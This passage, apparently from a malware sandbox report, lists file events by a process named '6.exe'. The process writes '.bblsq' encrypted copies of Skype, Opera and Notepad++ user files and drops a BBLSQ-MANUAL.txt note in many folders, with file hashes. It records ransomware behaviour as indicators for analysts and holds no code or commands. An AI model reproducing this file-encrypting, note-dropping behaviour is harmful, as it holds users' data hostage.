SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml.bblsq
binary
MD5: 29609fff5b18e6f12da9eb881b8a507f
SHA256: 5507d2ce21aaa9f21c98e87f2331fffc1713363eba87177a892f4dd7a54aab1a
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.bblsq
binary
MD5: e21de92d3a82c5e1a48b58fe0f0636c7
SHA256: bb343fa4c12bf5eda1e725ca955dcd82b2551b88808e5900d3b046bf0dc26ded
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\logs\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.bblsq
binary
MD5: afb6d46fa6d7e0ac935c9e5642bf80cf
SHA256: 1c65a4aa92247dd79c8aff0c666cc75bf332e5d51faa59253020879a91ea13e3
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Skype\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.bblsq
binary
MD5: 7ee8d31637e65a097670f0dab7075382
SHA256: 1d1202362f16d61b0fef203073b74dc83449ddca9bcfa0b461e2381240ec913f
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.bblsq
binary
MD5: 2d8a050804b633025c729e48c18fa5f7
SHA256: 73f792614b93483c55b9cc588d979f4245557da79a05e3c93893277cd48599a2
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.bblsq
binary
MD5: 59fe7e2fd5f0fc3ef19aa263f5b3fac0
SHA256: 876d6f0b45815d98caddcd45c3e1db859eca03e3ecf0e1c0f5fdc0f2dd509f8e
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.bblsq
binary
MD5: f087d02878ab19cedeefaa9561146f61
SHA256: 57e727d2ad343e048b5400602b27ca1e33715cb1d74f26fc0d9fa9875d52b0df
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.bblsq
binary
MD5: 962936fe862cff69c62def2a558dfc08
SHA256: 267e0a1ab635861eb6ab54c445a4cf7254949d1b6dea64025924ee491d9e36d5
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.bblsq
binary
MD5: 1f35c4a4cfb19b14f5f66e4eeda7d489
SHA256: 92d89042ce0cea2b1680498901596d8b65089a20a715a96738aec7e44c05beb7
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.bblsq
binary
MD5: cfc55a594beda4ce71dc8ae7ba7bd3bb
SHA256: 8674199b64e242bcffc00d870a5288b815438fdff76e7bd8a942317b7b656adf
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.bblsq
binary
MD5: 86c5d3ca0816036d3eb8c6c0604df234
SHA256: a158339f3491593af14275d4ff6da4994d69d61b0b3611f20115f4192c1ab8d0
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.bblsq
binary
MD5: bd0119e25ef6ec4c0c4e1dba84fe0519
SHA256: 92d096568e51623b4568e7dfe1939dade22e1924e24f7e9c82b5a75304b4713a
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.bblsq
binary
MD5: 7d79ad18780190cf6f153a8c26c0d537
SHA256: 5564c9f23956c1b600b995c6184eef6da1c48b645671f2cab2678d0dcf0e4b3e
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.bblsq
binary
MD5: 81cfffd9a27d31379b821100f0092a7c
SHA256: 461e920aef0d49fd1d0da25a0fb3c4a2e9b8c2e5c00c37af965f56be6e7f5cd1
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.bblsq
binary
MD5: e8fd933740127bad67bcd8b837ba6cba
SHA256: 736186d56170aac0dfe6390fb5b6bcc9e38807cb2065933864096d126b5b4041
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.bblsq
binary
MD5: 6878ec04bb9d1ed2e78d29c665b060d6
SHA256: 2d62764414d441e542f00ee654390b9c1c43762eeb6385ed09fdcbc1a7ac259a
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.bblsq
binary
MD5: 1b704cef02de5b90b58e31a2d6041ff0
SHA256: 5921a631b1aeacec4c87878d5a7347a852f420ba46c786f7a7dbafbfe398de6c
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.bblsq
binary
MD5: a5e060b8bf1ecfd7a71baa3c789e80ac
SHA256: 6ba4b2d08bfa11f867ee149928c926412ff16216cdfedcb5515a1f3cc8a2180a
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.bblsq
binary
MD5: 807e57146b1cecdfba9a3336450ce20a
SHA256: e252a47949fb362d70593782042bb349fbbba8e4737cbe6ffdbf17e316855d13
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.bblsq
binary
MD5: f5bb462397f589115d4ea3947f96a5d5
SHA256: 9f0fb0e4bb61910d105fbbb6a5b48abb600e99055e7c625ad66f46372a959843
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.bblsq
binary
MD5: cb735347dbaf92c7cb898cd5fd901fd2
SHA256: 10ab509d0273fbdfd8f6fe54c04d504d2cc0e1cece9c92f7f9b7b01cd72027fc
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.bblsq
binary
MD5: 907194d6fb65085516c7703af57edadd
SHA256: c0a757accdb19b2463466d35ccb0aeac4abaa7dbfb1f683697f9d019abfd41ce
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.bblsq
binary
MD5: b9478a126ff16aa5527f3e5b8230463a
SHA256: a3c6f83d80ff032bf189291f4894c4b7e4eb575af3b61660750f6d079a93a4d1
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.bblsq
binary
MD5: dc1be1cc1fb665d5e869ed4be30f57ed
SHA256: db89ae6b1494938c9afc6d4ad0058984c27fe82c66a19b20b5a2c48670525976
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.bblsq
binary
MD5: eb0f1904efc1f458832f4112f1f6f72f
SHA256: 01ca9c8390b01aebc4d654042061c637ddcb4bea5310a8d0cfa4f2acc0817ba8
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.bblsq
binary
MD5: c472707c5fa0625b03e40a04404074bd
SHA256: 2556e12571ae8971c7c0d81c679fe5ae39604fd0f777185a44ff1452860d33d5
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bblsq
binary
MD5: dad45d94476548e68e28334492d0865b
SHA256: 8e973b2b511128f584dacbb33f525c860cb795de6a1d8641e532b5f3d90df770
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.bblsq
binary
MD5: 56da98147ad28bf0e06a3276d79af2e8
SHA256: 77a18dc7ccf22f0ac855c3b0bd4cba15977bcbbae5c2accafbb72a35eccea208
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.bblsq
binary
MD5: 94cdaad772a24b9f23e21fbc4f764a41
SHA256: 3b033077cdc245fba094c4b447df4228bed0f971ea34076241f3967bdf5491e3
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.bblsq
binary
MD5: ddaa3d91b70c563fe964309d06385436
SHA256: ba8389d8edb89d4f412c62c6e920d5035d828d3d0c4d486c8839251f97078a34
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.bblsq
binary
MD5: 7c0e7b82f1975b13badc1bc05268c8c6
SHA256: 6519cddd2befcf0ef5bd9b9467720af3f700441f35e67dcb3313cf88dede0371
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.bblsq
binary
MD5: 591ca86d45d94cac3e4c849766f1fede
SHA256: b315365c617760f37eb6773813947e1f437585c96eec875d4006ca00810f7a39
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.bblsq
binary
MD5: 24e94aa45cb620d5594552f02d83419f
SHA256: 15e72b7847d33bd43951eba9ba3834446ce8d3fda5831f34e5ccff192538d7bd
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.bblsq
binary
MD5: 660a458e4da060a7ac3a351962c4debd
SHA256: 4c9a77a78deef82643371e85b834133929d3d5a08081d122c891a8dba3b78ca3
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.bblsq
binary
MD5: f3b7733ae834b6b912c20bc182eea0ad
SHA256: 68c5792aed82127ba49015339c8426bb9c04f9e2f1d64e785d0eb387bf9f9ddc
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.bblsq
binary
MD5: 78a8415267cde3de13c3aa4d541d6353
SHA256: dc2c2cf57f184d741ae8ba5c34bf4c676977773f6dfc3ca5b84fac96b4bd6feb
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.bblsq
binary
MD5: 59204305c4b700a3b50c6646567834a9
SHA256: 4819fe18da1140a58b9169415114de8cc62501a6dd99fb934097a261094161fa
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.bblsq
binary
MD5: bb3b5f36c79c7818fdcc98eed259bab4
SHA256: c2b9e0bf24a0914b0ec76356546352d6afee21f6cd10682d2f0e9d7a34859fe6
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.bblsq
binary
MD5: c74f681107c3a298e297fedcda2b2823
SHA256: b32bfadbf87a361618bd3aa2a0bb36117958c29e37ebf53ce1585756831e038f
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.bblsq
binary
MD5: b6e91e21b49165e14844c345468fb7f1
SHA256: 06abd1991519608b568ac7ea79714042153a6b3eb636883b6f20cc1452dba4bb
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.bblsq
binary
MD5: 4017f7e5da6569f9860f90b438b90ef2
SHA256: adbe9f21657e6f477d402af02731dc35922e1ebf8657a33ea18d9d58391c6645
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.bblsq
binary
MD5: 73382996088184fda4bdf6fa33173bb9
SHA256: 69c6535ccec7cf72f91506835467b094571f6109d537c01ead0ac66720069d92
2456
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.bblsq
binary
MD5: c95e5195f4641ebf725ed6184e16e292
SHA256: 9aa6e3b318a46e0f25daf2d4423e17c0158f47712ece0e2f509d74e29d7a03af
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.bblsq
binary
MD5: a09760dd3e830c04af6d92bc1835bdc5
SHA256: 41f688ced02c913c22a1064517894f55fad78616996c5b55fbc114d4f519b849
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.bblsq
binary
MD5: 69edf201bba5f8ed45c551570c174e51
SHA256: 380d50dd9799ddff1523dd230cea8a97f964c7deb7b04bcdbf726e3071731e4a
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.bblsq
binary
MD5: 77ba1bcf1c2f595cdaf3e1a406e02d83
SHA256: a300d2842aa2666fbab1ad57f6cb4b8af569ffa712765598f346a08733caa615
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.bblsq
binary
MD5: 7b942f179e98823e5e90244d4112a507
SHA256: 1e0585271c657d23c17580790158f12fa503b2d46f819edc5bc9cd4d8e0766ab
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.bblsq
binary
MD5: 22b2882b039527df9c1a9fc374433876
SHA256: c82bd2a1aeac338c5f0ec6101522aabb8d72fbfb7f80f4c58ea69ff7993ec147
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.bblsq
binary
MD5: 9d577c971029e2366876b3f386042fad
SHA256: 0e5458e1a276f8a0013d18257d01b41f093161bdda3d132c8a59ddf4606b9d17
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.bblsq
binary
MD5: ab63174857d2bdc2ecc082048d83dd64
SHA256: a1f088e1cc6f173218ea127bee32bf74ba73faafcf3bad40291cce13b2d25725
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.bblsq
binary
MD5: 1695c973366ec63bc0ebc0e5afb09789
SHA256: a85a03cce6ef516b80cfcf29270dac1d0d941aa5c3f7d92f30478f128a20e69d
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.bblsq
binary
MD5: cd45bcacdd4dc72bc5a182630a3d11db
SHA256: 58631180f630b7f34bd3b8b3b52a69dbc0c44630c9d6fe09b2da493e849ff391
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.bblsq
binary
MD5: 7ff7236706c864320441c249c8698c80
SHA256: 1616234dca79a0e842d4ea13c66b27c717f76fe99ab7363ea54d30c65cc1e95a
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.bblsq
binary
MD5: c892dfd32b73c04e40884d708b5725bf
SHA256: 6f0532490c088d8500ff84816474708dbba8f4c6744c4c6bf3984c07d2683604
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.bblsq
binary